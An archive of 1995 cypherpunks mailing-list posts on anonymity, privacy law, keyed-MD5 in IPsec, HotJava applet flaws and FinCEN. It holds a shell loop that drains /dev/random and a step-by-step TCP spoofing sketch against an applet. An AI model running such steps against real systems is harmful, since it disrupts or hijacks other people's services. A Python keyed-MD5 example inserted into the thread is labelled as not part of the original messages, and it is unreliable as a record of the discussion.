> If so, either the bogus money-laundering laws have to go (yay!) 
> or laws against selling to anonymous clients will get written (boo!) 
> or selective enforcement and entrapment will become increasingly popular, 
> leading merchants to refuse to do anonymous business just to defend 
> themselves against extortionists\\\\\\\\\\\\legitimate needs of law 
> enforcement?

Indeed. But really, _everyone_ who accepts cash and disburses money is a
money launderer. When I hand a bored high school student some cash for
lemonade at a supermarket, the market launders my money. I don't have to be
strongly anonymous. Even if they checked my ID before taking my greenbacks, 
they would have no way of knowing whether those were ill-gotten gains or not.
Monetary value just isn't intrinsically good or bad, period.

Don suggests the use of receipts to counter fraudulent theft claims. But how 
are we to arrange receipts for payer-anonymous transactions ?  With paper 
cash, banker Ursula of course need not worry about double spending, so she 
doesn't have to track which bills have been spent. That makes it hard for
Alice to fraudulently (or truthfully !) accuse Louie the Launderer of theft
via this protocol, unless Alice happens to be the Treasury Dept. 

-Futplex <futplex@pseudonym.com>
Please don't cc: me on replies to the list; I get too much mail as it is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 2 Nov 1995 11:29:47 +0800
To: cypherpunks@toad.com
Subject: Cable TV Privacy (was Re: InfoWar)
Message-ID: <199511010907.AA28156@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Scott Brickner writes:

> David G. Koontz writes:
> > 
> >>Industry representatives played down the privacy loopholes.
> >>Ronald Plesser, a Washington attorney who represents online
> >>services and direct marketing firms, said, "I know of no
> >>example of anybody trafficking in e-mail descriptions." A
> >>spokeswoman for Hughes Electronics Corp.'s DirecTV said, "We
> >>do not release names of customers that ordered movies.
> > 
> >The name of the customer of a video tape rental may be disclosed
> >only under narrow constraints (USC 18 Chap 121 2710):

> Didn't you read the post?  The whole point was that the constraints
> *don't* cover many *new* technology.  Sure, your local video store
> can't release the data, but your *cable* company is under no such
> constraint with regard to pay-per-view.  Ditto with Hughes DirecTV.

Local cable TV companies *are* constrained re recordkeeping about
consumer choices and disclosure of that data - see 47 USC 551, the
"Cable Television Consumer Protection and Competition Act of 1992".
They must disclose at the time you sign up for service and once
yearly what data they keep about your watching/purchasing choices, and
who that data is disclosed to. They must dispose of that data when it
is no longer useful for the purpose for which it was collected. 
Consumers get liquidated damages of the greater of $100 per day or
$1000, plus attorney's fees and (maybe) punitive damages.

But I agree that cable TV != DirecTV, and that Hughes seems to be
unregulated in this field.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJc4e33YhjZY3fMNAQFJJAP+M0G3St6Bhtjxzukt6kmjUsBQO2htEY1/
RVaIpitdsT/mXBHzrlkE8zC6kBTwK2vFha47vSUO4WyOfEvS02sbzY99XR7VwuIo
z/LTgFpc89ZLxFOYEPITZ/7AV/8+8Yau3FmlNOrfBnhQTOPlCFOfWeUEYaZFi1BH
64bpq1copqk=
=CWe+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 1 Nov 1995 14:31:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: W3 Self-Regulation?
In-Reply-To: <Pine.SOL.3.91.951031205913.1396A-100000@chivalry>
Message-ID: <199511010617.BAA05450@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


DDT writes:
# [Where's Tipper when you need her? Answer:]

Simon writes:
> Hey! Lay off the divine Ms. G!

Urgh. If I believed in a Hell, I'd expect the Parents Music Resource Center
to have its HQ there.

> There's actually a big difference between labelling and censorship, 

Agreed, to the extent that providers are not required to label their
products/services. But to my mind, the PICS software crosses the line between
labelling and censorship. In particular, it is a tool with which parents will
censor what their children encounter. 

Before Nathan Zook levels me, (hi :) let me elaborate. Such censorship seems
to be inevitable/necessary given the relationship between parents and their
children in our society. Parents are largely held liable for their
childrens' actions, while children generally are not responsible for their 
own actions. I believe this arrangement is unfair, but until/unless it
changes, parents must be given certain powers over those for whose actions 
they may be held liable.

We've hashed over this stuff several times before, so I'm not sure how much
sense it makes to reiterate it.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 4 Nov 1995 04:04:01 +0800
To: cypherpunks@toad.com
Subject: IBM's Microkernal
Message-ID: <199511010122.CAA29490@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


The Wall Street Journal, October 31, 1995, p. B6. 


IBM Announces New Software Code That Is Universal

By Laurie Hays


International Business Machines Corp., in its effort to reduce
the importance of computer-operating systems, announced a new
kind of universal-software code called Microkernal that
enables software to work on incompatible hardware.

For software developers and businesses that want to develop
one set of codes to run applications on many different
machines, Microkernal offers an opportunity for the
long-touted open computing. A big challenge remains, however:
to market the technology and make a business case for software
developers to write for Microkernal in a world that is
dominated by Intel Corp. and Microsoft Corp.

"It's exciting technology, but it will be hard for them to
market," says Dan Kuznetsky, an analyst with International
Data Corp., a Framingham, Mass., market-research firm. "It's
also got a long way to go from what they've announced to the
future."

Mr. Kuznetsky likens the technology to the development of a
great automobile transmission that has yet to be turned into
a truck or a car.

The key to Microkernal is a single source code base that
communicates between the hardware and the operating system.
One long-term possibility, for example, would be to make the
Apple Computer Inc.'s Macintosh operating system work on an
Intel PC, impossible today because the two have different
design architectures that don't talk to each other.

IBM's delayed OS/2 operating system for the PowerPC chip,
which is expected to be shipped by the end of the year, will
be the first IBM offering for the Microkernal allowing
developers to move applications to the chip with only small
changes.

IBM so far has garnered a number of licensing agreements for
Microkernal, including Digital Equipment Corp., Maynard,
Mass., and LG Electronics, formerly the Korean electronics
concern Goldstar, as well as a number of universities.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 18:35:42 +0800
To: anon-remailer@utopia.hacktic.nl (Anonymous)
Subject: Re: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <9511011022.AA08641@all.net>
MIME-Version: 1.0
Content-Type: text


> The most charitable explanation for "Dr." Fred is that
> he's degenerated into the professional equivalent of
> those pathetic aging former chess masters who try to
> eke out a subsistence living by charging five bucks a
> game. People often play with them out of sympathy, or
> for the novelty of having lost to a past great. It's
> part of the chess culture, and it's basically harmless
> and sort of quaint.

Most of them could still beat your chess game.

> The difference, of course, is that it's almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

Sour grapes, and from an anonymous poster too.  Oooo - I'm insulted.

I have been thinking about the issues of anonymity for some time, and I
have been convinced for some time that you can't have both integrity and
anonymity.  I thought there might be ways to accomplish this, but the
cypherpunks have convinced me it isn't true.  Show some integrity and
tell us who you are.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 1 Nov 1995 13:18:18 +0800
To: cypherpunks@toad.com
Subject: Re: From Bill Frezza: Electronic Warfare
Message-ID: <199511010500.GAA03716@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Bill Frezza <frezza@interramp.com> wrote:

> Attached is a column that will appear on the op-ed page of tomorrow's
> (10/30) Communications Week that was stimulated largely by a report filed

> Cypherpunks mailing list (majordomo@toad.com) you can get some excellent

list address is cypherpunks@toad.com
list manager is majordomo@toad.com
sending list mail to majordomo will not work

> cyberspace.  Heightened conflict is inevitable.  Expect the rhetoric to get
> a lot hotter as the government spinmeisters labor to keep us focused on
> public enemies while frantically trying to keep its hand in every citizen's
> pocket and its eyes on every bankbook.

the entire issue is not tied to money
the gummint is not just looking for more money

can't anyone from the media get it right

better story than w$j can make though
congratulations you're more clueful than the average media stooge






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 1 Nov 1995 23:39:19 +0800
To: cypherpunks@toad.com
Subject: US government department for crime enforcement!
Message-ID: <199511011440.GAA23008@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It's come to my attention that the US government has a group
called the 'Department of the Treasury Financial Crimes 
Enforcement Network' in Vienna, Virginia.

I know that bureaucrats like to keep themselves busy, but even 
I didn't think they would go so far as to enforce crimes to 
keep the law enforcement people busy.

What a curious way to spend the taxpayers' money.

Garfield

P.S. :-) for the humor impaired.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 1 Nov 1995 14:34:59 +0800
To: shields@tembel.org (Michael Shields)
Subject: Re: /dev/random for FreeBSD [was: Re: /dev/random for Linux]
Message-ID: <199511010614.IAA08682@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> In article <199510311715.TAA05821@grumble.grondar.za>,
> Mark Murray <mark@grondar.za> wrote:
> > forever {
> > 	cat /dev/random > /dev/null
> > }
> > 
> > Severely limiting most decent folk's chance at getting PGP to work.
> 
> Ideally, if two processes are trying to read /dev/random at the same time,
> both would get data at half-speed.  Doesn't it work that way already?

Ideally, yes. However most processes won't swamp (and deplete) /dev/random
like this will. Most (well-behaved) processes will (should) just take what
they need. The above loop tries quite hard to take all that is there,
so any process asking for randomness will be sharing with the above loop
on an almost byte-by-byte basis, like you suggest.

The above won't leave a "pool of randomness" to act as a buffer for user
requests, so will cause a nasty slowdown.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:13:30 +0800
To: cypherpunks@toad.com
Subject: Re: Please send cash
Message-ID: <v02110100acbd41b59c95@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Yo Fred, nobody said you were not right on the money, just that these issues
clearly have fixes and are part and parcel to a pre-adolescent product,
not a mature one.

Yes, you get two points for posting the bug report, but lose one for
soap-boxing about the woes of the product in general... Keep up the good
work, just drop the proselytizing and we all wouldn't mind hearing your rap.


BTW - If you or your friends are up for a game of speed-chess... I'm
willing, I used to be *rated* until I dropped off the circuit a few years
ago... Winged Benoni, Classical Ruy, or maybe an Accelerated Dragon (for
those who play the black)... I won't even charge you the nominal 5$ fee...

>I just picked this up from the Risks forum:
>
>> Date: Mon, 30 Oct 1995 16:14:59 -0500
>> From: Drew Dean <ddean@CS.Princeton.EDU>
>> Subject: HotJava 1.0 alpha 3 security issues
>>
>> We have found several security problems in the 1.0 alpha 3 release of
>> HotJava from Sun Microsystems.  The two most important problems are that
>> HotJava does not enforce the stated limits on where an applet can connect to
>> (an applet can talk to any place with which you have IP-level connectivity),
>> and HotJava is vulnerable to a man-in-the-middle attack, where someone can
>> watch your web-surfing, both seeing your requests, and the content that you
>> receive.
>
>Two of the Java attacks I outlined in this forum and got abuse for.
>
>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere.  At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>>
>> HotJava also allows an applet to set the proxy servers that the browser
>> uses.  This opens up a huge hole for anyone concerned about the privacy of
>> their web surfing.
>
>Attacks 31-49 work here.
>
>> Please note that these bugs are specific to the 1.0 alpha 3 release, and are
>> _not_ bugs in the Java language itself, nor do they apply to Netscape 2.0
>> beta 1J, which doesn't permit network connections.  We have notified Sun of
>> these problems, and are presently writing a paper on these and other issues.
>> We will make more information available on our Web page after we hear back
>> from Sun.
>
>Drat - Sun doesn't offer awards.
>
>>
>>     http://www.cs.princeton.edu/~ddean/java/
>>
>> Drew Dean                             Dan Wallach
>> ddean@cs.princeton.edu                        dwallach@cs.princeton.edu
>
>Inquiring minds want to know.
>
>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 1 Nov 1995 22:15:13 +0800
To: cypherpunks@toad.com
Subject: OH?_bob
Message-ID: <199511011354.IAA27676@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-1-95. NYPaper, Page One lead:


   "C.I.A. Tells Panel It Failed To Sift Spy Data.
   Disinformation May Have Led to Spending for Illusionary
   Perils."

      The C.I.A. admitted today that it knowingly gave the
      White House and the Pentagon inside information on the
      Soviet Union without warning that it came from foreign
      agents it knew or strongly suspected were controlled by
      Moscow. The information may have affected decisions to
      spend billions of dollars on military hardware. Even
      when the agency knew or suspected that its sources were
      double agents it never warned that its inside
      information was tainted. The agency thought it more
      important to protect its suspect Soviet sources than to
      tell the nation's leaders the truth. That disclosure
      threatens the C.I.A.'s foundation; its central mission
      is to speak the truth to those in power. "Something has
      gone terribly wrong," Senator Bob Kerrey said.


   OH?_bob  (8 kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:42:28 +0800
To: dan.schutzer@citibank.com
Subject: Re: Please send cash
Message-ID: <v02110102acbd48783387@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere.  At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>
>What if I start a Java applet then send it a faked TCP/IP packet from another
>host? Can I hotwire an outgoing connection that appears to be from the victim
>host?
>
>TCP/IP connections are not really all that directed. It is only the startup
>phase that is truly directed - someone has to start a conversation.
>
>Planned sequence of events :
>
>Mallet:
>        Send out Java applet to Alice
>        Send Bob a connection request packet on port 22
>        Alice's Java applet is accepting connections.
>        Send Alice a "request" packet claiming to come from port 22
>        Should now have an outgoing connection.
>
>???? I'm not a TCP/IP hacker (much). I'll ask our guru tomorrow after we
>are done with the NSA.
>
>
>                Phill


For the most part this scenario would work. The Java Applet that is doing
secure or authenticated work clearly must employ some form of embedded
authentication.

A cute trick we are employing in one applet under development here at LGT
is an embedded stream based bi-directional encryption engine. It provides a
direct mechanism to encrypt the data stream within the TCP datagram rather
than outside of it. Since the datagram itself is untouched the simple
interface that Java employs is unfettered. However this process adds some
performance overhead but allows for a virtual private network to be
constructed directly from the server to the applet context.

This project/concept will be released sometime in January along with some
underpinnings to plug into the FSTC EPayment Handler and its Architecture
along with the applet itself... Yes we will share it with the
CypherPunks... It's the best way I know to get a public testing/err bashing
and beta cycle on a concept.

We really are not trying to build a product in this effort, rather the
intent  is to prove that although the general "external transport" is/may
be unsecured, that the internal or upper layers do not necessarily suffer
from the same security leakage or process models, and that secure
transactions can successfully be layered upon these "existing"
underpinnings if they are adapted properly.

This is especially true with both HiJacking and Spoofing attack modalities.
But in our model with the upper layers events are synchronized and
validated such that there is little chance for these attack modalities to
succeed.

Again for the world to hear - The Java concept is a Transport Harness, not
the entire magilla. Clearly that is what is going on here... Without these
upper layers it is no safer than normal netscape or any other browser
transport.

Sincerely,

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 2 Nov 1995 12:29:40 +0800
To: baldwin@RSA.COM (Robert W. Baldwin)
Subject: Re: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815244951@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry,
        I wish that the field of cryptography was as well advanced
as the field of Bridge Building.  A modern Bridge Builder can design
a bridge that is easy to construct and will in fact last for 100 years.
Unfortunately, modern Cryptography is like Bridge Building in the
late 1800s.  Back then, it was possible to build bridges that did
last for 100 years but lots of cities refused to pay the extra costs
in materials, labor and time to make a solid bridge, and as a result
the bridges did not last.  To make it worse, there was no systematic
teaching of the best practices, so often no one would realize that
they had built and/or bought a weak bridge until the day that it
fell apart.
        The sad result of the state of the art in Cryptography is
that we end up with situations like the one you described where it
takes months to get agreement among Cryptographers and then it turns
out that one of the other choices would have been better.  Not
surprisingly, the other choices often run slower than the initial choice.
However, there is little guarantee that the second choice will resist
all new attacks.  One of the reasons that the IPsec authenticator was
analyzed was that it had been chosen as the IPsec authenticator.  As soon
as a large organization picks a new authenticator, the researchers will
try their hand on breaking that one.  In the field of Cryptographic
Engineering, we just don't have a well tested construct for authenticators.
        If the IPsec group was run by scientists instead of engineers,
then they would consider cryptographic constructs that have "provable"
security properties (e.g., faking this authenticator is as hard as
factoring a Blum integer (a composite number with two strong primes)).
The downside of having this kind of provable security is that the
packet processing time would be enormous.  You would lose all the
benefits of a T1 connection to the Internet in order to get provable
security on your authenticator or encryptor.  Speaking for myself,
I am glad that the IETF is run by engineers.

        The vitriol you spewed is quite justified.  People at RSA and
IBM both agreed that the IPsec authenticator would resist all known
attacks.  In fact, a fully conformant IPsec implementation will still
resist the new attack because IPsec requires that all keys be
changed every 2**32 packets.  However, this new attack makes Cryptographers
nervous.  Perhaps it could be extended to work with only 2**40 chosen packets
in which case there is a noticeable chance of it succeeding with only
2**32 packets.  Only further research will tell.  Currently, the only way
to get the MD5 key is to feed in 2**60 chosen messages of various lengths.
Of course, this is another good reason to use different keys for the
MD5 authenticator and packet encryption.  Wisely, IPsec requires different
keys for the authenticator and the encryptor.
        I also understand your being upset about not hearing about this
attack the moment it was published.  Actually, as soon as RSA Labs confirmed
the weakness we did call some of the editors of the IPsec specifications
to let them know about it.  The consensus was that this was not a show
stopper.  The IPsec protocols could be rolled out as is.  Later, once a
better authenticator had been developed and tested, it could be
substituted for the existing one.  One of the excellent features of the
IPsec specification is that new algorithms can be substituted easily
(modulo a "small matter of programming").
        Perhaps your main complaint is that it took time for the attack
to be confirmed by other researchers before the issue was brought to
the IPsec authors.  That is another effect of the current state of the
art in Cryptography, and an effect of the normal academic process.
It takes time to understand and confirm a weakness, and it is necessary
to confirm weaknesses (researchers make mistakes in designing attacks
just like they make mistakes in designing ciphers).  That's the way
things are in "cryptography today".

        I guess my conclusion is to say "Sorry".  Several professional
cryptographers gave it their best shot, and the authenticator turned
out to be somewhat weaker than expected.
                --Bob


______________________________ Reply Separator _________________________________
Subject: Re: Keyed-MD5, and HTTP-NG 
Author:  perry@piermont.com at INTERNET
Date:    10/31/95 5:25 PM

"baldwin" writes:
> Simon,
>         There are a few different ways to add key material to MD5 to
> make it suitable as a shared-secret authenticator function.  Some of these 
> are less resistant to attacks than others.  For example, the keyed MD5
> mechanism that is part of the current IPsec specifications can be
> attacked using 2**60 chosen messages.  Fortunately, the IPsec specs
> also require that the shared MD5 key be changed every 2**32 messages, 
> so this attack is unlikely to succeed.  Specifically, IPsec uses
> MD5 as follows:  X = MD5(key | keypad | Message), where "|" means 
> concatenation and the "keypad" pads out the key to 512 bits.
> Basically, this function is the same as standard MD5 with a
> different initialization vector for the compression operation 
> on the first block of the message.
>         RSA Labs recommends that people use an authenticator like
> X = MD5(key1, MD5(key2, Message)).  This resists the chosen plaintext 
> attacks that were published at the crypto conference in Spring 1995.

Pardon me. The amount of vitriol I am going to spew is probably 
difficult for people to understand because most folks around here 
weren't following the keyed MD5 discussions during the IPSEC work and 
have no idea of the sort of crap the professional cryptographic 
community put us through.

We spent months, and months, and months, and months, getting advice 
from every cryptographer on the planet. Every conceivable combination 
of pads, multiple keys, keys before the text, after, before and after, 
etc., was discussed over and over and over again.

Finally, the folks at RSA and IBM both agreed that Hugo's scheme, the 
one we were putting in to place, was the best possible one. (That's the 
one with the padded key.)

What the flying hell are you doing telling us now, and indeed not even 
telling the IPSEC community but instead mumbling on cypherpunks, that 
you guys were in possession of information BEFORE the entire 
discussion in midsummer that indicated that your own advice was wrong?

Perry
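
[Added example, not part of either message above and not the IPsec or RSA
Labs code: the two keyed-MD5 forms quoted in this thread, the "different
initialization vector" observation, and the rekey-after-2**32 rule. It
assumes the keypad is zero bytes, reads the comma in MD5(key1, MD5(key2,
Message)) as concatenation, and uses the hypothetical names PrefixKeyedMD5,
prefix_keyed_md5 and nested_keyed_md5; keys and packets are constructed.]

```python
import hashlib
import hmac

BLOCK = 64  # MD5 compresses 512-bit (64-byte) blocks


def prefix_keyed_md5(key: bytes, message: bytes) -> bytes:
    """X = MD5(key | keypad | Message); the keypad fills the key to 512 bits.

    Assumption: the keypad is zero bytes (the thread does not say).
    """
    if len(key) > BLOCK:
        raise ValueError("key must fit in one 512-bit block")
    keypad = b"\x00" * (BLOCK - len(key))
    return hashlib.md5(key + keypad + message).digest()


def nested_keyed_md5(key1: bytes, key2: bytes, message: bytes) -> bytes:
    """X = MD5(key1, MD5(key2, Message)), commas read as concatenation."""
    inner = hashlib.md5(key2 + message).digest()
    return hashlib.md5(key1 + inner).digest()


class PrefixKeyedMD5:
    """Prefix-keyed authenticator with an enforced key lifetime.

    The padded key is exactly one block, so hashing it once leaves MD5 in a
    key-dependent chaining state. Copying that state per packet is the
    "standard MD5 with a different initialization vector" view.
    """

    def __init__(self, key: bytes, rekey_after: int = 2**32):
        if len(key) > BLOCK:
            raise ValueError("key must fit in one 512-bit block")
        self._state = hashlib.md5(key + b"\x00" * (BLOCK - len(key)))
        self._remaining = rekey_after

    def tag(self, message: bytes) -> bytes:
        # Refuse to authenticate more packets than the key lifetime allows.
        if self._remaining <= 0:
            raise RuntimeError("key lifetime exhausted: rekey before sending")
        self._remaining -= 1
        h = self._state.copy()
        h.update(message)
        return h.digest()

    def verify(self, message: bytes, tag: bytes) -> bool:
        # Receiver side: recompute and compare in constant time.
        h = self._state.copy()
        h.update(message)
        return hmac.compare_digest(h.digest(), tag)


def demo() -> dict:
    # Constructed keys; the authenticator key is separate from any
    # encryption key, as the message above says IPsec requires.
    auth_key = b"constructed-auth-key"
    sender = PrefixKeyedMD5(auth_key, rekey_after=2)  # tiny limit for the demo
    receiver = PrefixKeyedMD5(auth_key)
    t1 = sender.tag(b"packet 1")
    sender.tag(b"packet 2")
    try:
        sender.tag(b"packet 3")
        refused = False
    except RuntimeError:
        refused = True
    return {
        "matches_one_shot": t1 == prefix_keyed_md5(auth_key, b"packet 1"),
        "accepts_genuine": receiver.verify(b"packet 1", t1),
        "rejects_altered": not receiver.verify(b"packet 1!", t1),
        "refused_after_limit": refused,
    }


if __name__ == "__main__":
    print(demo())
```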





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 Nov 1995 22:25:17 +0800
To: hallam@w3.org
Subject: Re: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510312015.AA00768@zorch.w3.org>
Message-ID: <199511011359.IAA01892@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >A keyed version of MD5 is the base authentication mechanism in IPSP
> >and it has been heavily examined by a number of very good
> >cryptographers.
> 
> Yes we reviewed it and said that it sucked.
> 
> Phil wrote a note to Ron and Ron sent in a series of comments.

Phil was complaining largely because in spite of his apparent
cryptography credentials he's a lughead who can't have been bothered
to understand the architecture -- most of his comments reflected a
general ignorance of the process and of the discussions that had
preceded. He also complained that the transforms weren't sufficiently
generic for his tastes. However, no complaints AT ALL were made about
Hugo's selection of cryptographic transform. We were assured by
everyone that it was the right thing to do, with people swearing up
and down that it was the appropriate idea. Do you want me to extract
the mailing list archives? Every last posting on this topic is on
line.

> The sequence of events I heard was that they asked Burt Kaliski for
> a suggestion, he gave them one and they chose something different.

Actually, Kaliski made an off-the-cuff suggestion that all the other
crypto folks ripped apart, largely because it was obvious even to me
how it could be attacked, and then he backed off.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 2 Nov 1995 02:20:14 +0800
To: cypherpunks@toad.com
Subject: Rivest on the Design of RC4
Message-ID: <9510018152.AA815247765@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Professor Ron Rivest will be presenting a talk titled
"The Design of RC4" at the RSA Data Security Conference in San Francisco
(January 17 to 19).  It should be interesting.
                --Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 2 Nov 1995 23:28:07 +0800
To: cypherpunks@toad.com
Subject: [cipher-request@itd.nrl.navy.mil: Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition]
Message-ID: <9511011535.AA05757@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


Please pardon the forward -- but y'all might be interested in this
newsletter...

==============================================================================
Date: Wed, 1 Nov 95 10:02:51 EST
From: <cipher-request@itd.nrl.navy.mil>
Reply-To: <cipher-request@itd.nrl.navy.mil>
To: <cipherdist@itd.nrl.navy.mil>
Subject:  Electronic CIPHER, Issue 10, November 1, 1995, Postcard edition

Dear Cipher Postcard subscriber,
The next issue of Cipher (EI#10, dated November 1, 1995)
is now available for downloading from the anonymous FTP site or from
the Archive on the Cipher Home Page.  This message includes only the 
table of contents and retrieval instructions. I will update the Web
pages as soon as I can.
Regards,
--Carl
====================================================================

       _/_/_/_/  _/_/_/  _/_/_/_/   _/    _/  _/_/_/_/  _/_/_/_/
      _/          _/    _/     _/  _/    _/  _/        _/     _/
     _/          _/    _/_/_/_/   _/_/_/_/  _/_/      _/_/_/_/
    _/          _/    _/         _/    _/  _/        _/   _/
   _/_/_/_/  _/_/_/  _/         _/    _/  _/_/_/_/  _/     _/

====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 10       November 1, 1995     Carl Landwehr, Editor
                                        Hilarie Orman, Assoc. Editor
====================================================================
Contents:                                         [1550 lines total]
Letter from the Editor 
Security and Privacy News Briefs:                       
 o S&P '96 deadline approaches
 o LISTWATCH: WWW-Security --  by Mary Ellen Zurko
 o US Navy ship's computers penetrated during JWID '95
 o US medical records confidentiality act (S.1360) introduced
 o Microsoft security: printer/network flaws/fixes; 
                       application-level object reuse problem
 o Netscape security: bucks for break-ins
 o Separation (micro)kernel from IBM?
 o European Commission to propose cryptography policy
 o FIRST to re-form as nonprofit
 o RSA pushes for firewall security standard
Articles and Conference Reports:
 o NISS notes:
 o IFIP WG11.3 Conference on Database Security; summary by David Spooner
Calls for Papers: Many! 
Reader's guide to recent security and privacy literature 
 o Conference Papers
 o Journal and Newsletter articles 
Calendar
Who's Where: recent address changes
New Reports available via FTP and WWW
Interesting Links 
DSL subscription offer
How to join the TC on Security and Privacy
Publications for sale 
TC officers
Information for Subscribers and Contributors  
____________________________________________________________________
Retrieval instructions:
 There is an archive that includes each copy distributed so far, in ascii,
 in files you can download at URL
 http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/cipher-archive.html
 There is also an anonymous FTP server that contains the same files.
 To access the archive via anonymous FTP:
 1. ftp www.itd.nrl.navy.mil
 2. At prompt for ID, enter "anonymous"
 3. At prompt for password, enter your actual, full e-mail address
 4. Once you are logged in, change to the Cipher Directory:
    cd pub/cipher
 5. Now you can request any of the files containing Cipher issues in ascii.
    Issues are named in the form: EI#N.9506  where N is the number of the
    issue desired and 9506 captures the year and month it first appeared.
=======end of Electronic Cipher Issue #10, 1 November 1995================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 03:42:06 +0800
To: cypherpunks@toad.com
Subject: Re: US government department for crime enforcement!
Message-ID: <acbcf81e00021004a02a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:40 PM 11/1/95, anonymous-remailer@shell.portal.com wrote:
>It's come to my attention that the US government has a group
>called the 'Department of the Treasury Financial Crimes
>Enforcement Network' in Vienna, Virginia.
>
>I know that bureaucrats like to keep themselves busy, but even
>I didn't think they would go so far as to enforce crimes to
>keep the law enforcement people busy.
>
>What a curious way to spend the taxpayers' money.

The Financial Crimes Enforcement Network, FinCEN, is well known to readers
of this list. If you grep for it in my Cyphernomicon FAQ, you should find
references in several places. I first learned of it in 1990, and have
followed it as best I can since. Not too much has been published about it.

It's an interagency working group, with participation by Treasury, State,
FBI, CIA, IRS, Justice, etc.

A good overview of it was in an early issue of "Wired," and is likely
available at the HotWired Web site.

FinCEN's Web page is:

http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html


--Tim May

